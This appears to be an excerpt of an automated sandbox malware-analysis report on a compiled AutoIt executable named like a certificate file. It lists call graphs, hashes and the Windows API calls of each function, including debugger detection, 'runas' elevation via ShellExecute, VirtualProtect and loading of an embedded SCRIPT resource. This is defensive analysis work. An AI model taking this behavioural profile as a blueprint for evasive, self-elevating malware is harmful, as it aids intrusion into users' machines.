95525->95527 95528 8cd645 53 API calls 95526->95528 95636 8dd922 55 API calls 2 library calls 95527->95636 95528->95533 95530 8c518c 48 API calls 95530->95533 95531 8c936c 81 API calls 95531->95533 95532 8c510d 48 API calls 95532->95533 95533->95510 95533->95511 95533->95512 95533->95513 95533->95515 95533->95516 95533->95517 95533->95523 95533->95525 95533->95530 95533->95531 95533->95532 95535 90a6fb 95534->95535 95536 8df4ea 48 API calls 95535->95536 95537 90a709 95536->95537 95538 90a717 95537->95538 95539 8cd7f7 48 API calls 95537->95539 95538->95491 95539->95538 95540->95482 95541->95482 95542->95491 95543->95483 95544->95490 95545->95483 95546->95483 95547->95473 95548->95469 95549->95484 95551 8c936c 81 API calls 95550->95551 95552 91f8ea 95551->95552 95575 91f92c Mailbox 95552->95575 95586 920567 95552->95586 95554 91fb8b 95555 91fcfa 95554->95555 95559 91fb95 95554->95559 95622 920688 89 API calls Mailbox 95555->95622 95558 91fd07 95558->95559 95561 91fd13 95558->95561 95599 91f70a 95559->95599 95560 8c936c 81 API calls 95579 91f984 Mailbox 95560->95579 95561->95575 95566 91fbc9 95613 8ded18 95566->95613 95569 91fbe3 95619 90cc5c 86 API calls 4 library calls 95569->95619 95570 91fbfd 95571 8dc050 48 API calls 95570->95571 95573 91fc14 95571->95573 95576 8d1b90 48 API calls 95573->95576 95584 91fc3e 95573->95584 95574 91fbee GetCurrentProcess TerminateProcess 95574->95570 95575->95498 95578 91fc2d 95576->95578 95577 91fd65 95577->95575 95582 91fd7e FreeLibrary 95577->95582 95620 92040f 105 API calls _free 95578->95620 95579->95554 95579->95560 95579->95575 95579->95579 95617 9229e8 48 API calls ___crtGetEnvironmentStringsW 95579->95617 95618 91fda5 60 API calls 2 library calls 95579->95618 95581 8d1b90 48 API calls 95581->95584 95582->95575 95584->95577 95584->95581 95621 8cdcae 50 API calls Mailbox 95584->95621 95623 92040f 105 API calls _free 95584->95623 95587 8cbdfa 48 API calls 95586->95587 95588 920582 CharLowerBuffW 95587->95588 95624 901f11 95588->95624 95592 8cd7f7 48 API calls 95593 9205bb 95592->95593 95631 8c69e9 48 API calls ___crtGetEnvironmentStringsW 95593->95631 95595 9205d2 95596 8cb18b 48 API calls 95595->95596 95597 9205de Mailbox 95596->95597 95598 92061a Mailbox 95597->95598 95632 91fda5 60 API calls 2 library calls 95597->95632 95598->95579 95600 91f725 95599->95600 95604 91f77a 95599->95604 95601 8df4ea 48 API calls 95600->95601 95603 91f747 95601->95603 95602 8df4ea 48 API calls 95602->95603 95603->95602 95603->95604 95605 920828 95604->95605 95606 920a53 Mailbox 95605->95606 95612 92084b _strcat _wcscpy __wsetenvp 95605->95612 95606->95566 95607 8ccf93 58 API calls 95607->95612 95608 8cd286 48 API calls 95608->95612 95609 8c936c 81 API calls 95609->95612 95610 8e395c 47 API calls _W_store_winword 95610->95612 95612->95606 95612->95607 95612->95608 95612->95609 95612->95610 95635 908035 50 API calls __wsetenvp 95612->95635 95614 8ded2d 95613->95614 95615 8dedc5 VirtualProtect 95614->95615 95616 8ded93 95614->95616 95615->95616 95616->95569 95616->95570 95617->95579 95618->95579 95619->95574 95620->95584 95621->95584 95622->95558 95623->95584 95625 901f3b __wsetenvp 95624->95625 95626 901f79 95625->95626 95627 901f6f 95625->95627 95630 901ffa 95625->95630 95626->95592 95626->95597 95627->95626 95633 8dd37a 60 API calls 95627->95633 95630->95626 95634 8dd37a 60 API calls 95630->95634 95631->95595 95632->95598 95633->95627 95634->95630 95635->95612 95636->95533 95637->95512

                                                                              Executed Functions

                                                                              Function 008EB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 643 8eb043-8eb080 call 8ef8a0 646 8eb089-8eb08b 643->646 647 8eb082-8eb084 643->647 649 8eb0ac-8eb0d9 646->649 650 8eb08d-8eb0a7 call 8e7bda call 8e7c0e call 8e6e10 646->650 648 8eb860-8eb86c call 8ea70c 647->648 651 8eb0db-8eb0de 649->651 652 8eb0e0-8eb0e7 649->652 650->648 651->652 655 8eb10b-8eb110 651->655 656 8eb0e9-8eb100 call 8e7bda call 8e7c0e call 8e6e10 652->656 657 8eb105 652->657 661 8eb11f-8eb12d call 8f3bf2 655->661 662 8eb112-8eb11c call 8ef82f 655->662 692 8eb851-8eb854 656->692 657->655 673 8eb44b-8eb45d 661->673 674 8eb133-8eb145 661->674 662->661 677 8eb7b8-8eb7d5 WriteFile 673->677 678 8eb463-8eb473 673->678 674->673 676 8eb14b-8eb183 call 8e7a0d GetConsoleMode 674->676 676->673 697 8eb189-8eb18f 676->697 680 8eb7d7-8eb7df 677->680 681 8eb7e1-8eb7e7 GetLastError 677->681 683 8eb55a-8eb55f 678->683 684 8eb479-8eb484 678->684 686 8eb7e9 680->686 681->686 687 8eb565-8eb56e 683->687 688 8eb663-8eb66e 683->688 690 8eb48a-8eb49a 684->690 691 8eb81b-8eb833 684->691 694 8eb7ef-8eb7f1 686->694 687->691 695 8eb574 687->695 688->691 693 8eb674 688->693 698 8eb4a0-8eb4a3 690->698 699 8eb83e-8eb84e call 8e7c0e call 8e7bda 691->699 700 8eb835-8eb838 691->700 696 8eb85e-8eb85f 692->696 702 8eb67e-8eb693 693->702 704 8eb856-8eb85c 694->704 705 8eb7f3-8eb7f5 694->705 706 8eb57e-8eb595 695->706 696->648 707 8eb199-8eb1bc GetConsoleCP 697->707 708 8eb191-8eb193 697->708 709 8eb4e9-8eb520 WriteFile 698->709 710 8eb4a5-8eb4be 698->710 699->692 700->699 701 8eb83a-8eb83c 700->701 701->696 712 8eb699-8eb69b 702->712 704->696 705->691 714 8eb7f7-8eb7fc 705->714 715 8eb59b-8eb59e 706->715 716 8eb1c2-8eb1ca 707->716 717 8eb440-8eb446 707->717 708->673 708->707 709->681 711 8eb526-8eb538 709->711 718 8eb4cb-8eb4e7 710->718 719 8eb4c0-8eb4ca 710->719 711->694 720 8eb53e-8eb54f 711->720 721 8eb69d-8eb6b3 712->721 722 8eb6d8-8eb719 WideCharToMultiByte 712->722 724 8eb7fe-8eb810 call 8e7c0e call 8e7bda 714->724 725 8eb812-8eb819 call 8e7bed 714->725 726 8eb5de-8eb627 WriteFile 715->726 727 8eb5a0-8eb5b6 715->727 728 8eb1d4-8eb1d6 716->728 717->705 718->698 718->709 719->718 720->690 729 8eb555 720->729 730 8eb6c7-8eb6d6 721->730 731 8eb6b5-8eb6c4 721->731 722->681 733 8eb71f-8eb721 722->733 724->692 725->692 726->681 738 8eb62d-8eb645 726->738 735 8eb5cd-8eb5dc 727->735 736 8eb5b8-8eb5ca 727->736 739 8eb1dc-8eb1fe 728->739 740 8eb36b-8eb36e 728->740 729->694 730->712 730->722 731->730 743 8eb727-8eb75a WriteFile 733->743 735->715 735->726 736->735 738->694 746 8eb64b-8eb658 738->746 747 8eb217-8eb223 call 8e1688 739->747 748 8eb200-8eb215 739->748 741 8eb375-8eb3a2 740->741 742 8eb370-8eb373 740->742 751 8eb3a8-8eb3ab 741->751 742->741 742->751 752 8eb75c-8eb776 743->752 753 8eb77a-8eb78e GetLastError 743->753 746->706 755 8eb65e 746->755 763 8eb269-8eb26b 747->763 764 8eb225-8eb239 747->764 749 8eb271-8eb283 call 8f40f7 748->749 773 8eb289 749->773 774 8eb435-8eb43b 749->774 757 8eb3ad-8eb3b0 751->757 758 8eb3b2-8eb3c5 call 8f5884 751->758 752->743 760 8eb778 752->760 762 8eb794-8eb796 753->762 755->694 757->758 765 8eb407-8eb40a 757->765 758->681 777 8eb3cb-8eb3d5 758->777 760->762 762->686 768 8eb798-8eb7b0 762->768 763->749 770 8eb23f-8eb254 call 8f40f7 764->770 771 8eb412-8eb42d 764->771 765->728 769 8eb410 765->769 768->702 775 8eb7b6 768->775 769->774 770->774 783 8eb25a-8eb267 770->783 771->774 778 8eb28f-8eb2c4 WideCharToMultiByte 773->778 774->686 775->694 780 8eb3fb-8eb401 777->780 781 8eb3d7-8eb3ee call 8f5884 777->781 778->774 782 8eb2ca-8eb2f0 WriteFile 778->782 780->765 781->681 788 8eb3f4-8eb3f5 781->788 782->681 785 8eb2f6-8eb30e 782->785 783->778 785->774 786 8eb314-8eb31b 785->786 786->780 789 8eb321-8eb34c WriteFile 786->789 788->780 789->681 790 8eb352-8eb359 789->790 790->774 791 8eb35f-8eb366 790->791 791->780
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
                                                                              • Instruction ID: ab47a111a730d5958d9a3ac3fcb6092f4b8d5dd99abbbe0fbc9821f4fdaaca96
                                                                              • Opcode Fuzzy Hash: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
                                                                              • Instruction Fuzzy Hash: 1A325D75B122688BDB248F19DC816EAB7B5FF47314F1841E9E40AE7A91D7309E80CF52
                                                                              Function 008C3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008C3AA3,?), ref: 008C3D45
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,008C3AA3,?), ref: 008C3D57
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00981148,00981130,?,?,?,?,008C3AA3,?), ref: 008C3DC8
                                                                                • Part of subcall function 008C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3DEE,00981148,?,?,?,?,?,008C3AA3,?), ref: 008C6471
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,008C3AA3,?), ref: 008C3E48
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009728F4,00000010), ref: 00931CCE
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00981148,?,?,?,?,?,008C3AA3,?), ref: 00931D06
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0095DAB4,00981148,?,?,?,?,?,008C3AA3,?), ref: 00931D89
                                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,008C3AA3), ref: 00931D90
                                                                                • Part of subcall function 008C3E6E: GetSysColorBrush.USER32(0000000F), ref: 008C3E79
                                                                                • Part of subcall function 008C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
                                                                                • Part of subcall function 008C3E6E: LoadIconW.USER32(00000063), ref: 008C3E9E
                                                                                • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A4), ref: 008C3EB0
                                                                                • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A2), ref: 008C3EC2
                                                                                • Part of subcall function 008C3E6E: RegisterClassExW.USER32(?), ref: 008C3F30
                                                                                • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C36E6
                                                                                • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                                • Part of subcall function 008C36B8: ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C371B
                                                                                • Part of subcall function 008C36B8: ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C3724
                                                                                • Part of subcall function 008C4FFC: _memset.LIBCMT ref: 008C5022
                                                                                • Part of subcall function 008C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                              Strings
                                                                              • runas, xrefs: 00931D84
                                                                              • This is a third-party compiled AutoIt script., xrefs: 00931CC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 438480954-3287110873
                                                                              • Opcode ID: 8f068a7e1105acfa7a3df73a9a6f0dead0026207224aac8a8abfdc43ed23bfc0
                                                                              • Instruction ID: 4897cb91e1ed067d7029a1639c77c22d0b62bc28d9333f8cf8793a9cf4fac68d
                                                                              • Opcode Fuzzy Hash: 8f068a7e1105acfa7a3df73a9a6f0dead0026207224aac8a8abfdc43ed23bfc0
                                                                              • Instruction Fuzzy Hash: DB510735A1C248AACF11ABF4DC49FED7B79FB56704F00802DF501E22A2DA7496469B22
                                                                              Function 008DDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1137 8dddc0-8dde4f call 8cd7f7 GetVersionExW call 8c6a63 call 8ddfb4 call 8c6571 1146 8dde55-8dde56 1137->1146 1147 9324c8-9324cb 1137->1147 1148 8dde58-8dde63 1146->1148 1149 8dde92-8ddea2 call 8ddf77 1146->1149 1150 9324e4-9324e8 1147->1150 1151 9324cd 1147->1151 1152 8dde69-8dde6b 1148->1152 1153 93244e-932454 1148->1153 1168 8ddea4-8ddec1 GetCurrentProcess call 8ddf5f 1149->1168 1169 8ddec7-8ddee1 1149->1169 1156 9324d3-9324dc 1150->1156 1157 9324ea-9324f3 1150->1157 1155 9324d0 1151->1155 1158 932469-932475 1152->1158 1159 8dde71-8dde74 1152->1159 1161 932456-932459 1153->1161 1162 93245e-932464 1153->1162 1155->1156 1156->1150 1157->1155 1163 9324f5-9324f8 1157->1163 1164 932477-93247a 1158->1164 1165 93247f-932485 1158->1165 1166 932495-932498 1159->1166 1167 8dde7a-8dde89 1159->1167 1161->1149 1162->1149 1163->1156 1164->1149 1165->1149 1166->1149 1170 93249e-9324b3 1166->1170 1171 8dde8f 1167->1171 1172 93248a-932490 1167->1172 1168->1169 1189 8ddec3 1168->1189 1174 8ddf31-8ddf3b GetSystemInfo 1169->1174 1175 8ddee3-8ddef7 call 8de00c 1169->1175 1177 9324b5-9324b8 1170->1177 1178 9324bd-9324c3 1170->1178 1171->1149 1172->1149 1180 8ddf0e-8ddf1a 1174->1180 1184 8ddf29-8ddf2f GetSystemInfo 1175->1184 1185 8ddef9-8ddf01 call 8ddff4 GetNativeSystemInfo 1175->1185 1177->1149 1178->1149 1182 8ddf1c-8ddf1f FreeLibrary 1180->1182 1183 8ddf21-8ddf26 1180->1183 1182->1183 1188 8ddf03-8ddf07 1184->1188 1185->1188 1188->1180 1191 8ddf09-8ddf0c FreeLibrary 1188->1191 1189->1169 1191->1180
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 008DDDEC
                                                                              • GetCurrentProcess.KERNEL32(00000000,0095DC38,?,?), ref: 008DDEAC
                                                                              • GetNativeSystemInfo.KERNELBASE(?,0095DC38,?,?), ref: 008DDF01
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF0C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF1F
                                                                              • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF29
                                                                              • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                              • String ID:
                                                                              • API String ID: 3851250370-0
                                                                              • Opcode ID: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                              • Instruction ID: 2b530d6d4b6b8889aad72feff0fa7b2e11e276931a75e2b4c5a48c1abefeb215
                                                                              • Opcode Fuzzy Hash: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                              • Instruction Fuzzy Hash: DF61B1B180A384CBCF15CFA898C15E97FB4BF2A304F194AD9D8459F307C624C909CB66
                                                                              Function 008C406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1209 8c406b-8c4083 CreateStreamOnHGlobal 1210 8c4085-8c409c FindResourceExW 1209->1210 1211 8c40a3-8c40a6 1209->1211 1212 934f16-934f25 LoadResource 1210->1212 1213 8c40a2 1210->1213 1212->1213 1214 934f2b-934f39 SizeofResource 1212->1214 1213->1211 1214->1213 1215 934f3f-934f4a LockResource 1214->1215 1215->1213 1216 934f50-934f6e 1215->1216 1216->1213
                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008C449E,?,?,00000000,00000001), ref: 008C407B
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C449E,?,?,00000000,00000001), ref: 008C4092
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F1A
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F2F
                                                                              • LockResource.KERNEL32(008C449E,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB,00000000), ref: 00934F42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                              • Instruction ID: 2f8c994475a7911e5f45ed093877f04676c22071eec8a4c45e4ecaec98dadd00
                                                                              • Opcode Fuzzy Hash: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                              • Instruction Fuzzy Hash: 55113C79244B01BFE7218B65EC58F277BB9EBC6B51F14816CF612D62A0DBB1DC409A20
                                                                              Function 00906CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00932F49), ref: 00906CB9
                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00906CCA
                                                                              • FindClose.KERNEL32(00000000), ref: 00906CDA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                              • Instruction ID: c3a4b9c878c0384332912052eff898e856dbdf7044a79f895596eda7cfc3c687
                                                                              • Opcode Fuzzy Hash: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                              • Instruction Fuzzy Hash: 72E0D8398294209BD2186738EC0D8E937ACDA0A339F100709FAF1C11D0E770E91056D5
                                                                              Function 008D3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID: @
                                                                              • API String ID: 3728558374-2766056989
                                                                              • Opcode ID: 974dd541f89b4e1250afd5cec7d63ae7e8802ccc6df215099092afdf0e80e0e0
                                                                              • Instruction ID: 3f8823dbb04989d7acb948cc44f238c2f3cb88f70170a4d2bb67fe963523d251
                                                                              • Opcode Fuzzy Hash: 974dd541f89b4e1250afd5cec7d63ae7e8802ccc6df215099092afdf0e80e0e0
                                                                              • Instruction Fuzzy Hash: E172BF75E04209AFCF24DF98C481AAEB7B5FF48304F14815AE909EB391D771AE45CB92
                                                                              Function 008D3200 Relevance: 1.0, Instructions: 986COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID:
                                                                              • API String ID: 3964851224-0
                                                                              • Opcode ID: 312a643a5dd4cda22076abf345cd297fed5893f280061a5404a4046326a9ef11
                                                                              • Instruction ID: e162603a8a5b9008b5cb20966be90525a7606173632467ef1116eb557d6bde24
                                                                              • Opcode Fuzzy Hash: 312a643a5dd4cda22076abf345cd297fed5893f280061a5404a4046326a9ef11
                                                                              • Instruction Fuzzy Hash: 29925A706083419FD724DF18C484B6AB7E5FF88308F148A6EE99A8B362D771ED45CB52
                                                                              Function 008CE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CE959
                                                                              • timeGetTime.WINMM ref: 008CEBFA
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CED2E
                                                                              • TranslateMessage.USER32(?), ref: 008CED3F
                                                                              • DispatchMessageW.USER32(?), ref: 008CED4A
                                                                              • LockWindowUpdate.USER32(00000000), ref: 008CED79
                                                                              • DestroyWindow.USER32 ref: 008CED85
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008CED9F
                                                                              • Sleep.KERNEL32(0000000A), ref: 00935270
                                                                              • TranslateMessage.USER32(?), ref: 009359F7
                                                                              • DispatchMessageW.USER32(?), ref: 00935A05
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00935A19
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                              • API String ID: 2641332412-570651680
                                                                              • Opcode ID: 89196d8ddd37eaef2f3dbaecf7abe32ea4a625adf406389e928bda95a96c18fb
                                                                              • Instruction ID: 8fb360937fda372b2b6becf3d1bf6cbc95772c5c635d0221b83978b20e5a52f1
                                                                              • Opcode Fuzzy Hash: 89196d8ddd37eaef2f3dbaecf7abe32ea4a625adf406389e928bda95a96c18fb
                                                                              • Instruction Fuzzy Hash: 59627D705083449FDB24DF28C885FAA77E8FF49304F18496DE98ADB292DB75D848CB52
                                                                              Function 008F5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___createFile.LIBCMT ref: 008F5EC3
                                                                              • ___createFile.LIBCMT ref: 008F5F04
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F2D
                                                                              • __dosmaperr.LIBCMT ref: 008F5F34
                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F47
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F6A
                                                                              • __dosmaperr.LIBCMT ref: 008F5F73
